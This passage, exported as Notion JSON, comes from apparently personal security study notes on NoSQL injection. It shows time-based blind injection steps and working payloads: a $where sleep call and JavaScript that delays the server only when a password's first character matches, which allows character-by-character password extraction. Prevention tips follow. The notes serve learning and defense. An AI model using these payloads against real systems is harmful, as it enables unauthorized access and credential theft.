injection","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"254dc9c5-3059-8099-a3e3-fdd6c849c472","parent":{"type":"block_id","block_id":"254dc9c5-3059-802e-ac4b-fb5179109d07"},"created_time":"2025-08-19T07:57:00.000Z","last_edited_time":"2025-08-19T07:57:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Sometimes, triggering an error in a NoSQL database doesn’t change how the website responds. In that case, you can still test for vulnerabilities by adding JavaScript that ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Sometimes, triggering an error in a NoSQL database doesn’t change how the website responds. In that case, you can still test for vulnerabilities by adding JavaScript that ","href":null},{"type":"text","text":{"content":"deliberately slows down the response","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"deliberately slows down the response","href":null},{"type":"text","text":{"content":".","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":".","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"254dc9c5-3059-801a-bf67-c070e1819fbd","parent":{"type":"block_id","block_id":"254dc9c5-3059-802e-ac4b-fb5179109d07"},"created_time":"2025-08-19T07:57:00.000Z","last_edited_time":"2025-08-19T07:57:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"How to do it:","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"How to do it:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"254dc9c5-3059-80a3-94a2-cf98db84bc4a","parent":{"type":"block_id","block_id":"254dc9c5-3059-802e-ac4b-fb5179109d07"},"created_time":"2025-08-19T07:57:00.000Z","last_edited_time":"2025-08-19T07:57:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"numbered_list_item","numbered_list_item":{"rich_text":[{"type":"text","text":{"content":"Measure normal speed","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Measure normal speed","href":null},{"type":"text","text":{"content":" – Load the page a few times to see how long it usually takes.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" – Load the page a few times to see how long it usually takes.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"254dc9c5-3059-807b-b934-cb5e6133e6d4","parent":{"type":"block_id","block_id":"254dc9c5-3059-802e-ac4b-fb5179109d07"},"created_time":"2025-08-19T07:57:00.000Z","last_edited_time":"2025-08-19T07:57:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"numbered_list_item","numbered_list_item":{"rich_text":[{"type":"text","text":{"content":"Inject a delay","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Inject a delay","href":null},{"type":"text","text":{"content":" – Use a payload that forces the database to pause.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" – Use a payload that forces the database to pause.","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"254dc9c5-3059-80d2-a5a0-c7388c727888","parent":{"type":"block_id","block_id":"254dc9c5-3059-807b-b934-cb5e6133e6d4"},"created_time":"2025-08-19T07:57:00.000Z","last_edited_time":"2025-08-19T07:57:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"Example:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Example:","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"254dc9c5-3059-805f-ae33-c3c2c9865705","parent":{"type":"block_id","block_id":"254dc9c5-3059-80d2-a5a0-c7388c727888"},"created_time":"2025-08-19T07:57:00.000Z","last_edited_time":"2025-08-19T07:57:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"{\"$where\": \"sleep(5000)\"}","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"{\"$where\": \"sleep(5000)\"}","href":null}],"language":"json"},"archived":false},{"object":"block","id":"254dc9c5-3059-8031-85c0-fbd052970bf4","parent":{"type":"block_id","block_id":"254dc9c5-3059-80d2-a5a0-c7388c727888"},"created_time":"2025-08-19T07:57:00.000Z","last_edited_time":"2025-08-19T07:57:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"This delays the response by 5 seconds if the injection works.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"This delays the response by 5 seconds if the injection works.","href":null}],"icon":null,"color":"default"},"archived":false}]}]},{"object":"block","id":"254dc9c5-3059-8032-a5d6-d0cbd8a7911f","parent":{"type":"block_id","block_id":"254dc9c5-3059-802e-ac4b-fb5179109d07"},"created_time":"2025-08-19T07:57:00.000Z","last_edited_time":"2025-08-19T07:57:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"numbered_list_item","numbered_list_item":{"rich_text":[{"type":"text","text":{"content":"Look for slowdown","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Look for slowdown","href":null},{"type":"text","text":{"content":" – If the page now takes longer to load, the injection succeeded.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" – If the page now takes longer to load, the injection succeeded.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"254dc9c5-3059-8056-ab7e-cb978d04602f","parent":{"type":"block_id","block_id":"254dc9c5-3059-802e-ac4b-fb5179109d07"},"created_time":"2025-08-19T07:57:00.000Z","last_edited_time":"2025-08-19T07:57:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Example payloads checking if the password starts with ","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Example payloads checking if the password starts with ","href":null},{"type":"text","text":{"content":"a","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"a","href":null},{"type":"text","text":{"content":":","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":":","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"254dc9c5-3059-8010-a738-f2c9d0869d35","parent":{"type":"block_id","block_id":"254dc9c5-3059-802e-ac4b-fb5179109d07"},"created_time":"2025-08-19T07:57:00.000Z","last_edited_time":"2025-08-19T07:57:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"' + function(x){\n var waitTill = new Date(new Date().getTime() + 5000);\n while((x.password[0]===\"a\") && waitTill > new Date()){};\n}(this) + '\n\n' + function(x){\n if(x.password[0]===\"a\"){sleep(5000)};\n}(this) + '","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"' + function(x){\n var waitTill = new Date(new Date().getTime() + 5000);\n while((x.password[0]===\"a\") && waitTill > new Date()){};\n}(this) + '\n\n' + function(x){\n if(x.password[0]===\"a\"){sleep(5000)};\n}(this) + '","href":null}],"language":"javascript"},"archived":false},{"object":"block","id":"254dc9c5-3059-80db-ac6f-f0fb4b8deea9","parent":{"type":"block_id","block_id":"254dc9c5-3059-802e-ac4b-fb5179109d07"},"created_time":"2025-08-19T07:57:00.000Z","last_edited_time":"2025-08-19T07:57:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"These make the server wait 5 seconds only if the first character of the password is ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"These make the server wait 5 seconds only if the first character of the password is ","href":null},{"type":"text","text":{"content":"a","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"a","href":null},{"type":"text","text":{"content":".","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":".","href":null}],"icon":null,"color":"default"},"archived":false}]},{"object":"block","id":"254dc9c5-3059-803f-bfd7-fcfa027ee7a0","parent":{"type":"page_id","page_id":"24fdc9c5-3059-8063-ae3e-c3b8fd82eacc"},"created_time":"2025-08-19T08:03:00.000Z","last_edited_time":"2025-08-19T08:04:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"toggle","toggle":{"rich_text":[{"type":"text","text":{"content":"Preventing NoSQL injection","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Preventing NoSQL injection","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"254dc9c5-3059-80ab-a876-c8c1541fc511","parent":{"type":"block_id","block_id":"254dc9c5-3059-803f-bfd7-fcfa027ee7a0"},"created_time":"2025-08-19T08:04:00.000Z","last_edited_time":"2025-08-19T08:04:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"The exact defenses depend on which NoSQL database you’re using, so always check its official security guidelines. However, these general steps help protect against attacks:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"The exact defenses depend on which NoSQL database you’re using, so always check its official security guidelines. However, these general steps help protect against attacks:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"254dc9c5-3059-80aa-b605-f61b8f67170e","parent":{"type":"block_id","block_id":"254dc9c5-3059-803f-bfd7-fcfa027ee7a0"},"created_time":"2025-08-19T08:04:00.000Z","last_edited_time":"2025-08-19T08:04:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"numbered_list_item","numbered_list_item":{"rich_text":[{"type":"text","text":{"content":"Sanitize and validate input","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Sanitize and validate input","href":null},{"type":"text","text":{"content":" – Only allow expected characters (use an allowlist).","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" – Only allow expected characters (use an allowlist).","href":null}],"color":"default"},"archived":false},{"object":"block","id":"254dc9c5-3059-80b1-a022-ef7e13529d46","parent":{"type":"block_id","block_id":"254dc9c5-3059-803f-bfd7-fcfa027ee7a0"},"created_time":"2025-08-19T08:04:00.000Z","last_edited_time":"2025-08-19T08:04:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"numbered_list_item","numbered_list_item":{"rich_text":[{"type":"text","text":{"content":"Use parameterized queries","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Use parameterized queries","href":null},{"type":"text","text":{"content":" – Don’t directly combine user input with queries.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" – Don’t directly combine user input with queries.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"254dc9c5-3059-8063-a260-cd818c1f5565","parent":{"type":"block_id","block_id":"254dc9c5-3059-803f-bfd7-fcfa027ee7a0"},"created_time":"2025-08-19T08:04:00.000Z","last_edited_time":"2025-08-19T08:04:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"numbered_list_item","numbered_list_item":{"rich_text":[{"type":"text","text":{"content":"Restrict keys","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Restrict keys","href":null},{"type":"text","text":{"content":" – Use an allowlist of allowed keys to block malicious operators.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" – Use an allowlist of allowed keys to block malicious operators.","href":null}],"color":"default"},"archived":false}]},{"object":"block","id":"250dc9c5-3059-808f-956c-e94c49eb26d7","parent":{"type":"page_id","page_id":"24fdc9c5-3059-8063-ae3e-c3b8fd82eacc"},"created_time":"2025-08-15T13:20:00.000Z","last_edited_time":"2026-03-23T08:31:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Good Resource:","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Good Resource:","href":null},{"type":"text","text":{"content":"\n","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"\n","href":null},{"type":"text","text":{"content":"https://github.com/swisskyrepo/PayloadsAllTheThings","link":{"url":"https://github.com/swisskyrepo/PayloadsAllTheThings"}},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"https://github.com/swisskyrepo/PayloadsAllTheThings","href":"https://github.com/swisskyrepo/PayloadsAllTheThings"}],"icon":null,"color":"default"},"archived":false}],"title":"NoSQL injection"}]